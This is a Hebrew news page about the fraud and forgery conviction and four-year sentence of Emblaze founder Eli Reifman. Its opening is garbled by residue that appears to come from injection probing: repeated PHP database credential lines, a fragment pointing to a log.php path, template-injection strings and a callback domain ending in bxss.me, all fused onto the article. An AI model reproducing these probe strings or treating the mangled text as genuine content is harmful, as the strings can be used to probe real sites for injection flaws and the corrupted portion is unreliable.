$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> אלי רייפמן מייסד אמבלייז הורשע ונידון למאסר בפועל בעבירות קבלת דבר במרמה וזיוף
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
חיפוש באתר
מאמרים אחרונים

אלי רייפמן נידון לארבע שנות מאסר בפועל

תאריך: 19/09/2011 16:34   מחבר: מערכת האתר

יסוד המרמה והזיוף לפי כתב אישום

חברת אמבלייז שייסד רייפמן נקלעה לקשיים והתקשה להיחלץ מהם. רייפמן לפי כתב האישום חיפש מקורות מימון חלופיים להשקעה בחברה ולסילוק חובות קיימים. לפי כתב האישום שהוגש בסוף שנת 2009 רייפמן ניהל משא ומתן עם חברת "וינטון קפיטל הולדינגס" על קבלת הלוואה בסך 3 מיליון דולר. החברה המלווה בפוטנציה דרשה בטוחות להלוואה שהתבקשה להעמיד בדמות 9 מליון מניות של חברת אמבלייז שרייפמן טען כלפיה שהם בבעלותו.

רייפמן נענה לדרישה לקבלת הבטוחות. מה שהוא לא אמר לחברה המלווה, וינטון, שהמניות לא בבעלותו ולכן החליט לרמות את החברה והודיע לה שכל המניות המבוקשות בשווי 9 מיליון מוחזקות בידי נאמן שאת זהותו אינו יכול לגלות. לטענתו, רק הוא ועורך הדין שערך את הסכם ההלוואה, דורון אפיק יודעים את זהותו האמיתית של הנאמן.

כדי להוכיח לחברה המלווה שהמניות המבוקשות כבטוחה אכן קיימות, זייף רייפמן מסמך הנחזה להיות חתום על ידי אנדרו דאימונד, נציג של חברת  פין אנד קו, חברת ברוקרים מאנגליה.

במסמך המזויף רשם רייפמן כי ביום 17/02/2009 החזיקה חברה זו בחשבונו של רייפמן לפחות 9 מליון מניות של חברת אמבלייז.

עוד הואשם רייפמן כי את המסמך המזוייף העביר אל עורך דין אפיק, כדי שזה יצרפו להסכם ההלוואה. ואכן, המצג הכוזב עשה את שלו על החברה המלווה, ממנה קיבל 3 מליון דולר ביום 18/2/2009 והתחייב להחזירה ביום 11/4/2009 בתוספת עמלה.

גזר דין

בעקבות הרשעתו בעבירות המיוחסות ושהוכחו בבית המשפט גזר על רייפמן השופט דוד רוזן 4 שנות מאסר בפועל וחייב אותו לשלם פיצוי למתלוננים נגדו בסך 6.3 מליון דולר.

פושט רגל

בהתחשב במצבו הכלכלי ולאור העובדה שהוכרז על ידי בית המשפט כפושט רגל בהליך כינוס נכסים שהושת עליו, לא ברור כיצד ומאלו מקורות יגייס רייפמן את הכסף לתשלום הפיצוי

 

 

תגיות בעמוד:   הרשעה    מאסר בפועל    רייפמן    אמבלייז    זיוף מסמך    דורון אפיק